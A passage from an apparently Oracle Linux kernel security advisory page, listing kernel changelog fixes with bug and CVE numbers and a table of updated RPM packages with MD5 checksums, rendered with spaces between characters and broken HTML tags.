6 5 8 ] b r > - [ c h a r ] f i x c o r r u p t e d i n t e l _ r n g k e r n e l m e s s a g e s ( J e r o m e M a r c h a n d ) [ 4 7 7 7 7 8 ] b r > - [ n e t ] i p v 6 : d o n o t f w d p k t s w i t h t h e u n s p e c i f i e d s a d d r ( J i r i P i r k o ) [ 5 1 7 8 9 9 ] b r > - [ a t a ] a h c i : a d d d e v i c e I D f o r 8 2 8 0 1 J I s a t a c o n t r o l l e r ( D a v i d M i l b u r n ) [ 5 0 6 2 0 0 ] b r > - [ m i s c ] s u p p o r t I n t e l m u l t i - A P I C - c l u s t e r s y s t e m s ( P r a r i t B h a r g a v a ) [ 5 0 7 3 3 3 ] b r > - [ e x t 3 ] f i x o n l i n e r e s i z e b u g ( J o s e f B a c i k ) [ 5 1 5 7 5 9 ] b r > - [ x e n ] n e t b a c k : c a l l n e t d e v _ f e a t u r e s _ c h a n g e d ( H e r b e r t X u ) [ 4 9 3 0 9 2 ] b r > - [ n e t ] i g b v f : r e c o g n i z e f a i l u r e t o s e t m a c a d d r e s s ( S t e f a n A s s m a n n ) [ 5 1 2 4 6 9 ] b r > - [ m i s c ] d o c u m e n t a t i o n : f i x f i l e - n r d e f i n i t i o n i n f s . t x t ( D a n n y F e n g ) [ 4 9 7 2 0 0 ] b r > - [ m i s c ] c p u f r e q : d o n t s e t p o l i c y f o r o f f l i n e c p u s ( P r a r i t B h a r g a v a ) [ 5 1 1 2 1 1 ] b r > - [ n e t ] s u n r p c c l i e n t : I F f o r b i n d i n g t o a l o c a l a d d r e s s ( J e f f L a y t o n ) [ 5 0 0 6 5 3 ] b r > - [ f s ] n l m : t r a c k l o c a l a d d r e s s a n d b i n d t o i t f o r C B s ( J e f f L a y t o n ) [ 5 0 0 6 5 3 ] b r > - [ n e t ] s u n r p c : s e t r q _ d a d d r i n s v c _ r q s t o n s o c k e t r e c v ( J e f f L a y t o n ) [ 5 0 0 6 5 3 ] b r > - [ c p u f r e q ] P - s t a t e l i m i t : l i m i t c a n n e v e r b e i n c r e a s e d ( S t a n i s l a w G r u s z k a ) [ 4 8 9 5 6 6 ] b r > - [ c r y p t o ] s 3 9 0 : p e r m i t w e a k k e y s u n l e s s R E Q _ W E A K _ K E Y s e t ( J a r o d W i l s o n ) [ 5 0 4 6 6 7 ] b r > - [ f s ] p r o c f s : f i x f i l l a l l s u b d i r s a s D T _ U N K N O W N ( D a n n y F e n g ) [ 5 0 9 7 1 3 ] b r > - [ b l o c k ] l l _ r w _ b l k : m o r e f l e x a b l e r e a d _ a h e a d _ k b s t o r e ( D a n n y F e n g ) [ 5 1 0 2 5 7 ] b r > - [ a u d i t ] c o r r e c t t h e r e c o r d l e n g t h o f e x e c v e ( A m e r i g o W a n g ) [ 5 0 9 1 3 4 ] b r > - [ n e t ] t c p : d o n o t u s e T S O / G S O w h e n t h e r e i s u r g e n t d a t a ( D a n n y F e n g ) [ 5 0 2 5 7 2 ] b r > - [ n e t ] v x g e : n e w d r i v e r f o r N e t e r i o n 1 0 G b E t h e r n e t ( M i c h a l S c h m i d t ) [ 4 5 3 6 8 3 ] b r > - [ n e t ] v x g e : M a k e f i l e , K c o n f i g a n d c o n f i g a d d i t i o n s ( M i c h a l S c h m i d t ) [ 4 5 3 6 8 3 ] b r > - [ p c i ] a d d P C I E x p r e s s l i n k s t a t u s r e g i s t e r d e f i n i t i o n s ( M i c h a l S c h m i d t ) [ 4 5 3 6 8 3 ] b r > - [ n e t ] 8 1 3 9 t o o : R T N L a n d f l u s h _ s c h e d u l e d _ w o r k d e a d l o c k ( J i r i P i r k o ) [ 4 8 7 3 4 6 ] b r > - [ x 8 6 ] s u s p e n d - r e s u m e : w o r k o n l a r g e l o g i c a l C P U s y s t e m s ( J o h n V i l l a l o v o s ) [ 4 9 9 2 7 1 ] b r > - [ g f s 2 ] ' > > ' d o e s n o t u p d a t e c t i m e , m t i m e o n t h e f i l e ( A b h i j i t h D a s ) [ 4 9 6 7 1 6 ] b r > - [ n e t ] i c m p : f i x i c m p _ e r r o r s _ u s e _ i n b o u n d _ i f a d d r s y s c t l ( J i r i P i r k o ) [ 5 0 2 8 2 2 ] b r > - [ n f s ] f i x s t r i p p i n g S U I D / S G I D f l a g s w h e n c h m o d / c h g r p d i r ( P e t e r S t a u b a c h ) [ 4 8 5 0 9 9 ] b r > - [ n e t ] b o n d i n g : a l l o w b o n d i n m o d e b a l a n c e - a l b t o w o r k ( J i r i P i r k o ) [ 4 8 7 7 6 3 ] b r > - [ x 8 6 ] f i x m c p 5 5 a p i c r o u t i n g ( N e i l H o r m a n ) [ 4 7 3 4 0 4 ] b r > - [ n e t ] r t l 8 1 3 9 : s e t m a c a d d r e s s o n r u n n i n g d e v i c e ( J i r i P i r k o ) [ 5 0 2 4 9 1 ] b r > - [ n e t ] t u n : a l l o w g r o u p o w n e r s h i p o f T U N / T A P d e v i c e s ( J i r i P i r k o ) [ 4 9 7 9 5 5 ] b r > - [ n e t ] t c p : d o n o t u s e T S O / G S O w h e n t h e r e i s u r g e n t d a t a ( J i r i O l s a ) [ 4 9 7 0 3 2 ] b r > - [ m i s c ] u n d e f i n e d r e f e r e n c e t o _ _ u d i v d i 3 ( A m e r i g o W a n g ) [ 4 9 9 0 6 3 ] b r > b r > [ 2 . 6 . 1 8 - 1 6 7 . e l 5 ] b r > - [ s c s i ] s t . c : m e m o r y u s e a f t e r f r e e a f t e r M T S E T B L K i o c t l ( D a v i d J e f f e r y ) [ 5 2 0 1 9 2 ] b r > - [ n f s ] k n f s d : f i x N F S v 4 O _ E X C L c r e a t e s ( J e f f L a y t o n ) [ 5 2 4 5 2 1 ] { C V E - 2 0 0 9 - 3 2 8 6 } b r > - [ n e t ] r 8 1 6 9 : b a l a n c e p c i _ m a p / u n m a p p a i r , u s e h w p a d d i n g ( I v a n V e c e r a ) [ 5 1 5 8 5 7 ] b r > - [ n e t ] t c : f i x u n i t i a l i z e d k e r n e l m e m o r y l e a k ( J i r i P i r k o ) [ 5 2 0 8 6 3 ] b r > - [ m i s c ] k t h r e a d s : k t h r e a d _ c r e a t e v s k t h r e a d _ s t o p ( ) r a c e ( O l e g N e s t e r o v ) [ 4 4 0 2 7 3 ] b r > - [ n e t ] f i x u n b a l a n c e r t n l l o c k i n g i n r t _ s e c r e t _ r e s c h e d u l e ( N e i l H o r m a n ) [ 5 1 0 0 6 7 ] b r > b r > [ 2 . 6 . 1 8 - 1 6 6 . e l 5 ] b r > - [ x 8 6 _ 6 4 ] k v m : b o u n d l a s t _ k v m t o p r e v e n t b a c k w a r d s t i m e ( G l a u b e r C o s t a ) [ 5 2 4 0 7 6 ] b r > - [ x 8 6 ] k v m : f i x v s y s c a l l g o i n g b a c k w a r d s ( G l a u b e r C o s t a ) [ 5 2 4 0 7 6 ] b r > - [ m i s c ] f i x R N G t o n o t u s e f i r s t g e n e r a t e d r a n d o m b l o c k ( N e i l H o r m a n ) [ 5 2 2 8 6 0 ] b r > - [ x 8 6 ] k v m : m a r k k v m c l o c k _ i n i t a s c p u i n i t ( G l a u b e r C o s t a ) [ 5 2 3 4 5 0 ] b r > - [ x 8 6 _ 6 4 ] k v m : a l l o w k v m c l o c k t o b e o v e r w r i t t e n ( G l a u b e r C o s t a ) [ 5 2 3 4 4 7 ] b r > - [ x 8 6 ] k v m c l o c k : f i x b o g u s w a l l c l o c k v a l u e ( G l a u b e r C o s t a ) [ 5 1 9 7 7 1 ] b r > - [ s c s i ] s c s i _ d h _ r d a c e : a d d m o r e s u n h a r d w a r e ( m c h r i s t i @ r e d h a t . c o m ) [ 5 1 8 4 9 6 ] b r > - [ m i s c ] c p r n g : f i x c o n t t e s t t o b e f i p s c o m p l i a n t ( N e i l H o r m a n ) [ 5 2 3 2 5 9 ] b r > - [ n e t ] b r i d g e : f i x L R O c r a s h w i t h t u n ( A n d y G o s p o d a r e k ) [ 4 8 3 6 4 6 ] b r > - R e v e r t : [ n e t ] a t a l k / i r d a : m e m o r y l e a k t o u s e r i n g e t n a m e ( D o n Z i c k u s ) [ 5 1 9 3 1 0 ] { C V E - 2 0 0 9 - 3 0 0 1 C V E - 2 0 0 9 - 3 0 0 2 } b r > - R e v e r t : [ x 8 6 _ 6 4 ] f i x g e t t i m e o d a y T S C o v e r f l o w i s s u e - 1 ( D o n Z i c k u s ) [ 4 6 7 9 4 2 ] b r > b r > [ 2 . 6 . 1 8 - 1 6 5 . e l 5 ] b r > - [ n e t ] s k y 2 : r e v e r t s o m e p h y p o w e r r e f a c t o r i n g c h a n g e s ( N e i l H o r m a n ) [ 5 0 9 8 9 1 ] b r > - [ n e t ] a t a l k / i r d a : m e m o r y l e a k t o u s e r i n g e t n a m e ( D a n n y F e n g ) [ 5 1 9 3 1 0 ] { C V E - 2 0 0 9 - 3 0 0 1 C V E - 2 0 0 9 - 3 0 0 2 } b r > - [ x 8 6 _ 6 4 ] f i x g e t t i m e o d a y T S C o v e r f l o w i s s u e - 1 ( P r a r i t B h a r g a v a ) [ 4 6 7 9 4 2 ] b r > - [ m d ] p r e v e n t c r a s h w h e n a c c e s s i n g s u s p e n d _ * s y s f s a t t r ( D a n n y F e n g ) [ 5 1 8 1 3 6 ] { C V E - 2 0 0 9 - 2 8 4 9 } b r > - [ n f s ] n l m _ l o o k u p _ h o s t : d o n t r e t u r n i n v a l i d a t e d n l m _ h o s t ( S a c h i n S . P r a b h u ) [ 5 0 7 5 4 9 ] b r > - [ n e t ] b o n d i n g : t l b / a l b : s e t a c t i v e s l a v e w h e n e n s l a v i n g ( J i r i P i r k o ) [ 4 9 9 8 8 4 ] b r > - [ n f s ] r / w I / O p e r f d e g r a d e d b y F L U S H _ S T A B L E p a g e f l u s h ( P e t e r S t a u b a c h ) [ 4 9 8 4 3 3 ] b r > - [ S E L i n u x ] a l l o w p r e e m p t i o n b / w t r a n s i t i o n p e r m c h e c k s ( E r i c P a r i s ) [ 5 1 6 2 1 6 ] b r > - [ s c s i ] s c s i _ t r a n s p o r t _ f c : f c _ u s e r _ s c a n c o r r e c t i o n ( D a v i d M i l b u r n ) [ 5 1 5 1 7 6 ] b r > - [ n e t ] t g 3 : r e f r a i n f r o m t o u c h i n g M P S ( J o h n F e e n e y ) [ 5 1 6 1 2 3 ] b r > - [ n e t ] q l g e : f i x h a n g s a n d r e a d p e r f o r m a n c e ( M a r c u s B a r r o w ) [ 5 1 7 8 9 3 ] b r > - [ s c s i ] q l a 2 x x x : a l l o w u s e o f M S I w h e n M S I - X d i s a b l e d ( M a r c u s B a r r o w ) [ 5 1 7 9 2 2 ] b r > - [ n e t ] m l x 4 _ e n f i x f o r v l a n t r a f f i c ( D o u g L e d f o r d ) [ 5 1 4 1 4 1 ] b r > - [ n e t ] m l x 4 _ e n d e v i c e m u l t i - f u n c t i o n p a t c h ( D o u g L e d f o r d ) [ 5 0 0 3 4 6 ] b r > - [ n e t ] m l x 4 _ c o r e : f a i l s t o l o a d o n l a r g e s y s t e m s ( D o u g L e d f o r d ) [ 5 1 4 1 4 7 ] b r > - [ x 8 6 ] d i s a b l e k v m c l o c k b y d e f a u l t ( G l a u b e r C o s t a ) [ 4 7 6 0 7 5 ] b r > - [ x 8 6 ] d i s a b l e k v m c l o c k w h e n s h u t i n g t h e m a c h i n e d o w n ( G l a u b e r C o s t a ) [ 4 7 6 0 7 5 ] b r > - [ x 8 6 ] r e - r e g i s t e r c l o c k a r e a i n p r e p a r e _ b o o t _ c p u ( G l a u b e r C o s t a ) [ 4 7 6 0 7 5 ] b r > - [ x 8 6 ] k v m c l o c k s m p s u p p o r t ( G l a u b e r C o s t a ) [ 4 7 6 0 7 5 ] b r > - [ x 8 6 ] u s e k v m w a l l c l o c k ( G l a u b e r C o s t a ) [ 4 7 6 0 7 5 ] b r > - [ x 8 6 _ 6 4 ] k v m c l o c k s o u r c e s i m p l e m e n t a t i o n ( G l a u b e r C o s t a ) [ 4 7 6 0 7 5 ] b r > - [ x 8 6 ] k v m : i m p o r t k v m c l o c k . c ( G l a u b e r C o s t a ) [ 4 7 6 0 7 5 ] b r > - [ x 8 6 ] k v m : i m p o r t p v c l o c k . c a n d h e a d e r s ( G l a u b e r C o s t a ) [ 4 7 6 0 7 5 ] b r > - [ x 8 6 ] e x p o r t a d d i t i o n a l c p u f l a g s i n / p r o c / c p u i n f o ( P r a r i t B h a r g a v a ) [ 5 1 7 9 2 8 ] b r > - [ x 8 6 ] d e t e c t A P I C c l o c k c a l i b r a t i o n p r o b l e m s ( P r a r i t B h a r g a v a ) [ 5 0 3 9 5 7 ] b r > - [ f s ] c i f s : n e w o p t s t o d i s a b l e o v e r r i d i n g o f o w n e r s h i p ( J e f f L a y t o n ) [ 5 1 5 2 5 2 ] b r > - [ x 8 6 ] p n p a c p i : f i x s e r i a l p o r t s o n I B M P o i n t - o f - S a l e H W ( K e v i n M o n r o e ) [ 5 0 6 7 9 9 ] b r > / p > \n \n \n b r > h 2 > R e l a t e d C V E s / h 2 > \n b r > t a b l e c e l l p a d d i n g = \" 2 \" c e l l s p a c i n g = \" 2 \" b o r d e r = \" 0 \" w i d t h = \" 1 0 0 % \" > t b o d y > \n t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 0 9 - 4 0 2 7 . h t m l \" > C V E - 2 0 0 9 - 4 0 2 7 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 0 9 - 4 3 0 7 . h t m l \" > C V E - 2 0 0 9 - 4 3 0 7 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 0 - 0 7 2 7 . h t m l \" > C V E - 2 0 1 0 - 0 7 2 7 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 0 - 1 1 8 8 . h t m l \" > C V E - 2 0 1 0 - 1 1 8 8 / a > / t d > / t r > \n / t b o d y > / t a b l e > \n \n b r > h 2 > U p d a t e d P a c k a g e s / h 2 > \n b r > t a b l e c e l l p a d d i n g = \" 2 \" c e l l s p a c i n g = \" 2 \" b o r d e r = \" 0 \" w i d t h = \" 1 0 0 % \" > t b o d y > \n t r s t y l e = \" c o l o r : # F F 0 0 0 0 ; \" > t d > b > R e l e a s e / A r c h i t e c t u r e / b > t d > b > F i l e n a m e / b > / t d > t d > b > M D 5 s u m / b > / t d > t d > b > S u p e r s e d e d B y A d v i s o r y / b > / t d > / t r > \n t r > t d c o l s p a n = \" 4 \" > / t d > / t r > t r > t d > O r a c l e L i n u x 5 ( i 3 8 6 ) / t d > t d > k e r n e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . s r c . r p m / t d > t d > 7 7 2 7 3 2 e d 5 1 f 2 6 1 7 c 2 a 4 c 5 8 3 6 2 7 3 a b 0 b 7 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > o c f s 2 - 2 . 6 . 1 8 - 1 9 4 . e l 5 - 1 . 4 . 4 - 1 . e l 5 . s r c . r p m / t d > t d > b b e 4 6 2 b 8 2 c 7 c a 3 0 1 2 0 6 6 8 e 0 c f d 9 8 c a 5 6 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o r a c l e a s m - 2 . 6 . 1 8 - 1 9 4 . e l 5 - 2 . 0 . 5 - 1 . e l 5 . s r c . r p m / t d > t d > 9 8 6 5 6 f d 8 2 3 2 2 a 6 0 9 9 1 b 6 a 8 c e 9 6 d 3 9 0 8 b / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i 6 8 6 . r p m / t d > t d > 5 3 8 a 3 d 0 9 2 2 5 d 7 7 3 2 c b 4 2 a 2 5 9 a d 2 a c d 8 0 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - P A E - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i 6 8 6 . r p m / t d > t d > c 3 3 5 2 0 a 0 0 d 1 5 a c b f 0 9 8 2 b 5 d a 9 a 6 4 8 d 2 f / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - P A E - d e v e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i 6 8 6 . r p m / t d > t d > f a 1 e a 9 7 c e 9 f a 5 0 d 7 f 7 f 3 0 d 8 f a 7 e 4 4 6 3 6 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - d e b u g - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i 6 8 6 . r p m / t d > t d > b b e 8 b 9 b 1 d e 0 1 e d 9 d 4 b a e 9 0 7 d a 5 f 9 9 9 d 5 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - d e b u g - d e v e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i 6 8 6 . r p m / t d > t d > a e b e 6 c 8 0 c 4 8 6 3 3 0 5 a 5 a 4 6 1 b 0 a 1 7 c f 9 3 f / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - d e v e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i 6 8 6 . r p m / t d > t d > 7 c b 6 3 0 7 2 7 9 5 c 5 2 2 d 9 d 3 c 6 e e a 0 a b 2 4 2 d 1 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - d o c - 2 . 6 . 1 8 - 1 9 4 . e l 5 . n o a r c h . r p m / t d > t d > 5 d 0 7 0 f 1 d d 6 b 2 a e 2 2 6 0 9 9 b 0 f 8 f 0 a c e 3 9 2 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - h e a d e r s - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i 3 8 6 . r p m / t d > t d > 1 5 c 7 d 0 9 f f 1 1 1 9 c 5 e 1 f a 8 1 1 a e 0 4 0 4 c 2 6 d / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - x e n - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i 6 8 6 . r p m / t d > t d > c 4 3 0 f 3 1 c b 7 0 9 4 8 b 6 8 6 7 0 c 4 4 6 e c c c 0 7 8 f / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - x e n - d e v e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i 6 8 6 . r p m / t d > t d > 6 f f 3 b 9 7 3 7 d 7 0 e 7 7 e d 9 1 3 f 7 5 9 3 b 3 1 b a a 5 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > o c f s 2 - 2 . 6 . 1 8 - 1 9 4 . e l 5 - 1 . 4 . 4 - 1 . e l 5 . i 6 8 6 . r p m / t d > t d > b 7 a a 2 e 0 9 3 f 3 9 e 6 2 d 6 b b 4 c 1 1 1 5 c 7 f a a 1 8 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o c f s 2 - 2 . 6 . 1 8 - 1 9 4 . e l 5 P A E - 1 . 4 . 4 - 1 . e l 5 . i 6 8 6 . r p m / t d > t d > e 0 9 4 3 2 4 e e 4 3 2 4 c c 1 3 e 7 f 1 f 9 5 e c d 5 b 1 f a / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o c f s 2 - 2 . 6 . 1 8 - 1 9 4 . e l 5 d e b u g - 1 . 4 . 4 - 1 . e l 5 . i 6 8 6 . r p m / t d > t d > 8 f 1 d d 3 c e d 9 0 d 3 9 1 8 9 a 6 c 2 7 1 f 1 2 f 5 8 0 b 3 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o c f s 2 - 2 . 6 . 1 8 - 1 9 4 . e l 5 x e n - 1 . 4 . 4 - 1 . e l 5 . i 6 8 6 . r p m / t d > t d > f 7 d a 4 4 d 1 8 9 d 3 c 9 b 9 c c 5 d 9 7 6 5 e 8 e 4 f f 8 0 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o r a c l e a s m - 2 . 6 . 1 8 - 1 9 4 . e l 5 - 2 . 0 . 5 - 1 . e l 5 . i 6 8 6 . r p m / t d > t d > e 9 d 2 2 c f 8 c d 5 5 d 6 3 8 0 5 c a 5 6 f a 0 9 8 b 2 6 5 c / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o r a c l e a s m - 2 . 6 . 1 8 - 1 9 4 . e l 5 P A E - 2 . 0 . 5 - 1 . e l 5 . i 6 8 6 . r p m / t d > t d > 5 2 7 4 f 3 b 1 a 1 e a 4 0 8 b 8 0 8 c f 0 6 3 a 6 d 1 a d 1 d / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o r a c l e a s m - 2 . 6 . 1 8 - 1 9 4 . e l 5 d e b u g - 2 . 0 . 5 - 1 . e l 5 . i 6 8 6 . r p m / t d > t d > c 3 5 2 4 c 7 2 f e 6 1 5 6 3 7 7 6 0 6 6 e f 3 9 6 f d 1 9 1 0 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o r a c l e a s m - 2 . 6 . 1 8 - 1 9 4 . e l 5 x e n - 2 . 0 . 5 - 1 . e l 5 . i 6 8 6 . r p m / t d > t d > 0 c a 2 f b f f 3 e 5 8 e 0 f 5 6 7 9 2 c 4 9 8 b 8 e f d d 0 5 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d c o l s p a n = \" 4 \" > / t d > / t r > t r > t d > O r a c l e L i n u x 5 ( i a 6 4 ) / t d > t d > k e r n e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . s r c . r p m / t d > t d > 7 7 2 7 3 2 e d 5 1 f 2 6 1 7 c 2 a 4 c 5 8 3 6 2 7 3 a b 0 b 7 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > o c f s 2 - 2 . 6 . 1 8 - 1 9 4 . e l 5 - 1 . 4 . 4 - 1 . e l 5 . s r c . r p m / t d > t d > b b e 4 6 2 b 8 2 c 7 c a 3 0 1 2 0 6 6 8 e 0 c f d 9 8 c a 5 6 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o r a c l e a s m - 2 . 6 . 1 8 - 1 9 4 . e l 5 - 2 . 0 . 5 - 1 . e l 5 . s r c . r p m / t d > t d > 9 8 6 5 6 f d 8 2 3 2 2 a 6 0 9 9 1 b 6 a 8 c e 9 6 d 3 9 0 8 b / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i a 6 4 . r p m / t d > t d > 5 8 f e 6 4 f a 6 3 9 2 a b 6 8 f d 4 6 e e 0 3 a 9 9 4 6 5 b 1 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - d e b u g - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i a 6 4 . r p m / t d > t d > 9 f d 9 e a 8 7 5 e 6 6 b b b b c 1 1 a 4 5 e 0 9 4 1 7 f 7 2 9 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - d e b u g - d e v e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i a 6 4 . r p m / t d > t d > c 1 0 5 4 4 8 c 9 d 9 0 f d 9 a 1 7 5 8 7 9 1 8 8 9 a b 3 b 0 4 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - d e v e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i a 6 4 . r p m / t d > t d > b a 0 c 3 c b 6 6 2 f 3 2 d 2 5 9 0 9 6 b 7 9 5 a 7 a 5 0 a 6 8 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - d o c - 2 . 6 . 1 8 - 1 9 4 . e l 5 . n o a r c h . r p m / t d > t d > 5 d 0 7 0 f 1 d d 6 b 2 a e 2 2 6 0 9 9 b 0 f 8 f 0 a c e 3 9 2 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - h e a d e r s - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i a 6 4 . r p m / t d > t d > 6 2 4 9 1 8 7 a 4 1 d f c c c 0 3 f 4 6 8 3 d 7 7 f f b 6 c 6 d / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - x e n - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i a 6 4 . r p m / t d > t d > 0 5 4 d 8 8 2 6 2 3 6 b 6 a 0 6 9 2 f 8 c c c f 2 4 9 0 a 5 8 0 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > k e r n e l - x e n - d e v e l - 2 . 6 . 1 8 - 1 9 4 . e l 5 . i a 6 4 . r p m / t d > t d > e f 4 0 a 7 0 2 8 3 7 9 2 f d 4 1 f 9 5 b 6 d 8 4 d d a 5 c 0 1 / t d > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / e r r a t a / E L S A - 2 0 1 7 - 1 4 8 2 - 1 . h t m l \" > E L S A - 2 0 1 7 - 1 4 8 2 - 1 / a > / t d > / t r > t r > t d > / t d > t d > o c f s 2 - 2 . 6 . 1 8 - 1 9 4 . e l 5 - 1 . 4 . 4 - 1 . e l 5 . i a 6 4 . r p m / t d > t d > 1 4 f 6 f 2 9 8 9 b 2 a a b 6 5 5 5 7 b 3 5 7 8 4 5 a a d b c 3 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > o c f s 2 - 2 . 6 . 1 8 - 1 9 4 . e l 5 d e b u g - 1 . 4 . 4 - 1 . e l 5 . i a 6 4 . r p m / t d > t d > 5 3 0 3 1 b 0 d 7 4 3 a 3 9 f 8 4 4 9 2 d d 1 d f 3 e 8 d d 5 d / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d 